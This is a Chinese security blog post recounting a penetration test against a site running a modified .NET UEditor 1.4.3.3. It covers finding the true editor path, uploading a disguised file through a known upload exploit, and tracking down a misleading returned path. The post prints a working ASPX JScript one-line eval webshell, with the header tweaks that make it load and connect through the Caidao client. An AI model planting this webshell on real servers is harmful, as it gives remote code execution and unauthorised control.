佛学的魔改.net Ueditor
前几天在驻场时候遇到一个套娃的站,一个站里面套了N多个站,域名相同,根据不同的子目录进行区分,由于现在已经修复了,只能尽量还原当时的场景来写这文章。
网站上传点对上传的文件进行了二次渲染,此处无法绕过,只能寻找其他突破口(因为套了不少站,浪费大量时间)。
翻功能的时候,在一个站点找到这么一个编辑器,是不是很眼熟。
通过fd抓包获取到编辑器路径为:
https://xxx.xxx.com.cn/crm9000/HtmlControl/ueditor1.4.3.3/
果断用exp去打,结果访问漏洞地址的时候,发现404。
查看上传功能,发现上传功能也无法正常使用,提示后端配置项无法正常加载。
查看配置文件,感觉也没有问题呀,此时有点郁闷。
在牧马大佬的提示下,仔细查看js和流量。首先查看js,发现此处加载了一个Add.js文件。
打开这个js文件,找到了ueditor的真实路径。
但是去访问的时候,发现地址无法访问。
通过查看加载编辑器时的网络包,可以看到这也是后端配置项无法正常加载的原因。
然后尝试直接拼接编辑器路径到域名上,发现访问成功,原来是开发配置得有问题,多加了端口。
既然能够正常访问,那我就不客气了,拿exp干他,先在服务器上丢个aa.jpg的一句话马。
上传成功,返回的路径为:upload/image/201912/11/6371165485276351045218627.aspx
(记住这个该死的路径,等下要懵逼。)
接下来就是寻找路径了,我tm找了半个多小时呀,拼接了各种路径,都没找到。。。
后来实在无奈,继续去查看配置文件,看到配置文件的时候,人是懵逼的,路径是对的呀,但感觉总有哪里不对劲。
然后不信这个邪,又重新上传了一次,发现此时返回的路径是
upload/image/20191211/6371165520599596974371346.aspx
仔细一看,第一次返回的路径中多了’/‘,感情是服务端返回了一个假路径给我,难怪配置文件看着哪里不对劲,原来是路径规则。
但是访问shell的时候,报了一个错,第一次遇到这种问题。
直接在aa.jpg里面加上<head runat="server" />
,再上传,浏览器访问的时候就正常了,但是菜刀连接的时候,又报了这一堆东西(同事复现的时候,菜刀直接连接成功,佛学)。
<head>
<link href="../../../../../../../App_Themes/default/default.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/EnStyle.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/Style.css" type="text/css" rel="stylesheet" /><title>
</title></head>
继续把这些加到aa.jpg内容里,最后,aa.jpg内容为:
<head runat="server" />
<link href="../../../../../../../App_Themes/default/default.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/EnStyle.css" type="text/css" rel="stylesheet" /><link href="../../../../../../../App_Themes/green/Style.css" type="text/css" rel="stylesheet" /><title>
</title></head>
<%@ Page Language="Jscript"%><%eval(Request.Item["g"],"unsafe");%>
上传成功后,菜刀连接成功。
本文作者: iceH
本文链接: http://www.secice.cn/p/256d1eb
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-SA 4.0 协议 ,转载请注明出处!